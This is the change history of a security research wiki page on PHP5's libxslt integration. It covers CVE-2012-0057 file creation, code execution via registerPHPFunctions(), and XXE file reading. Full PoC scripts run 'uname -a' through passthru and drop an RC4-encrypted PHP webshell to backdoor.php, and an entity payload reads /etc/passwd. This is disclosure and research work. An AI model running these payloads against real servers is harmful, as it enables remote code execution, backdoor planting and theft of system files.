Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version Icon 3.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 16:28
Change comment: Upload new attachment create-file-via-libxslt.php
To version Icon 20.1
edited by Nicolas Gregoire
on 2012/02/02 17:29
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Tags
... ... @@ -1,0 +1,1 @@
1 +php|libxslt|code execution
Content
... ... @@ -1,5 +1,41 @@
1 +{{toc/}}
2 +
3 += Introduction =
4 +
1 1  Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/PHP||rel="__blank"]] : "//PHP is a general-purpose server-side scripting language originally designed for web development to produce dynamic web pages. It is among one of the first developed server-side scripting languages that is embedded into a HTML source document, rather than calling an external file to process data. Ultimately, the code is interpreted by a web server with a PHP processor module which generates the resulting web page.//"
2 2  
7 += Creating files =
3 3  
9 +Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engine side, typically for dropping a PHP Web Shell. This vulnerability ([[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]] / [[CVE-2012-0057>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0057||rel="__blank" title="CVE-2012-0057"]]) was patched in version 5.3.9 ([[ChangeLog>>http://php.net/ChangeLog-5.php#5.3.9||rel="__blank"]]).
4 4  
5 -Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted using xsltSetSecurityPrefs(). It was then possible to create / overwrite files on the engine side, typically for dropping a PHP Web Shell (cf [[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]).
11 +== Simple PoC ==
12 +
13 +The attached [[create-file-via-libxslt.php>>attach:create-file-via-libxslt.php]] PoC will drop a basic PHP script in /tmp/.
14 +
15 +== PoC with crypto ==
16 +
17 +A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script ([[attach:php539-xslt.php]]) will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php".
18 +
19 += Executing PHP code =
20 +
21 +A call to [[registerPHPFunctions()>>http://php.net/manual/en/xsltprocessor.registerphpfunctions.php]] allows to execute standard PHP functions directly from the XSLT stylesheet. I never came across this pattern in real-life engagements but Google Code search references [[several>>http://www.google.com/codesearch#search/&q=registerPHPFunctions%20lang:%5Ephp$&type=cs||rel="__blank"]] instances of it (dork: "registerPHPFunctions lang:^php$"). This isn't a bug and will not be patched.
22 +
23 +
24 +|=Namespace |=Extension function |=PoC |=Note
25 +| http:~/~/php.net/xsl| Any PHP function|[[execute-code-via-libxslt.php>>attach:execute-code-via-libxslt.php]]| A call to registerPHPFunctions() is needed
26 +
27 +The attached [[execute-code-via-libxslt.php>>attach:execute-code-via-libxslt.php]] PoC will use the passthru() PHP function to execute "uname -a".
28 +
29 += Reading binary files via PHP filters =
30 +
31 +{{warning}}
32 +Untested : could we read binary files too ?
33 +{{/warning}}
34 +
35 +<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
36 +<scan>&test;</scan>
37 +Source : http://www.idontplaydarts.com/2011/02/scanning-the-internal-network-using-simplexml/
38 +
39 += Anti XEE =
40 +
41 +http://www.php.net/manual/en/function.libxml-disable-entity-loader.php
Icon execute-code-via-libxslt.php
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +653 bytes
Content
... ... @@ -1,0 +1,36 @@
1 +<?php
2 +
3 +$sXml = '<empty/>';
4 +
5 +$sXsl = <<<EOT
6 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
7 + xmlns:php="http://php.net/xsl"
8 + version="1.0">
9 +
10 + <xsl:template match="/">
11 + <xsl:value-of select="php:function('passthru', 'uname -a')"/>
12 + </xsl:template>
13 +
14 +</xsl:stylesheet>
15 +EOT;
16 +
17 +# LOAD XML FILE
18 +$XML = new DOMDocument();
19 +$XML->loadXML( $sXml );
20 +
21 +# LOAD XSLT FILE
22 +$XSL = new DOMDocument();
23 +$XSL->loadXML( $sXsl );
24 +
25 +# START XSLT
26 +$xslt = new XSLTProcessor();
27 +$xslt->importStylesheet( $XSL );
28 +
29 +# Register PHP functions as XSLT extensions !
30 +$xslt->registerPHPFunctions();
31 +
32 +# TRASNFORM & PRINT
33 +print $xslt->transformToXML( $XML );
34 +
35 +?>
36 +
Icon php539-xslt.php
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +2.0 KB
Content
... ... @@ -1,0 +1,68 @@
1 +
2 +<?php
3 +
4 +// Get parameters
5 +$action = $_POST['action'];
6 +$xml = $_POST['xml'];
7 +$xsl = $_POST['xsl'];
8 +
9 +print "<html><body>";
10 +if ($action == "transform") {
11 +
12 + print "<h2>Ready to transform ...</h2><br/>";
13 +
14 + # LOAD XML FILE
15 + $xmldom = new DOMDocument();
16 + print "XML: <pre>".htmlentities($xml)."</pre><br/>";
17 + $xmldom->loadXML($xml);
18 +
19 + # LOAD XSLT FILE
20 + $xsldom = new DOMDocument();
21 + print "XSL: <pre>".htmlentities($xsl)."</pre><br/>";
22 + $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted !
23 +
24 + # START XSLT
25 + $xslproc = new XSLTProcessor();
26 + $xslproc->importStylesheet($xsldom);
27 +
28 + # TRANSFORM & PRINT
29 + $output = $xslproc->transformToXML($xmldom); // File creation !
30 + print "Output: <pre>".htmlentities($output)."</pre><br/>";
31 +
32 +} else {
33 +
34 + # DISPLAY A PRE-FILLED FORM
35 + print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>";
36 + print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>";
37 + print "<form method='post'>";
38 + print "XML document:<br/>";
39 + print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>";
40 + print "XSLT code:<br/>";
41 + print "<textarea name='xsl' rows='20' cols='130'>";
42 +print <<<XSLT
43 +<xsl:stylesheet
44 + version="1.0"
45 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
46 + xmlns:cry="http://exslt.org/crypto"
47 + xmlns:sax="http://icl.com/saxon"
48 + extension-element-prefixes="cry sax">
49 +
50 + <xsl:template match="/">
51 + <sax:output href="/var/www/xxx/backdoor.php" method="text">
52 + <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/>
53 + </sax:output>
54 + <xsl:text>A webshell have been dropped</xsl:text>
55 + </xsl:template>
56 +
57 +</xsl:stylesheet>
58 +XSLT;
59 + print "</textarea><br/><br/>";
60 + print "<input type='hidden' name='action' value='transform'/>";
61 + print "<input type='submit'/></form>";
62 +
63 +}
64 +print "</body></html>";
65 +
66 +?>
67 +
68 +